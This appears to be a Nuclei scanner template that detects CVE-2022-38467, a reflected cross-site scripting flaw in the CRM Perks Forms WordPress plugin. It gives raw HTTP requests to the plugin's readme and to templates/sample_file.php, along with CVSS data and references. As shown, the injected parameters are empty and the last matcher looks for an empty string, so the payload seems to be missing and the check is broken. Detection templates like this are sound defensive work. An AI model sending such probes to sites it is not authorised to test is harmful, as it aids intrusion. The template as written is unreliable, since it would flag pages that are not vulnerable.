id: CVE-2022-38467 info: name: CRM Perks Forms < 1.1.1 - Cross Site Scripting author: r3Y3r53 severity: medium description: | The plugin does not sanitise and escape some parameters from a sample file before outputting them back in the page, leading to Reflected Cross-Site Scripting impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 1.1.1 reference: - https://wpscan.com/vulnerability/4b128c9c-366e-46af-9dd2-e3a9624e3a53 - https://wordpress.org/plugins/crm-perks-forms/ - https://nvd.nist.gov/vuln/detail/CVE-2022-38467 - https://patchstack.com/database/vulnerability/crm-perks-forms/wordpress-crm-perks-forms-plugin-1-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-38467 cwe-id: CWE-79 epss-score: 0.00074 epss-percentile: 0.30453 cpe: cpe:2.3:a:crmperks:crm_perks_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: crmperks product: crm_perks_forms framework: wordpress tags: cve2022,cve,crm-perks-forms,wpscan,wordpress,wp,wp-plugin,xss,crmperks http: - raw: - | GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1 Host: {{Hostname}} - | GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php?FirstName=&LastName=&%20Company= HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code_1 == 200' - 'contains(content_type_2, "text/html")' - 'contains(body_1, "CRM Perks Forms") && contains(body_2, "")' condition: and # digest: 4b0a00483046022100eeaaa40af379d77811cc1343094e6b8412719b312bd1cb7561ba293380ed5841022100821277d2e851584fdff4d956aaf6c6cd6f8c9f7094c146c1050f78580eb0b34e:922c64590222798bb761d5b6d8e72950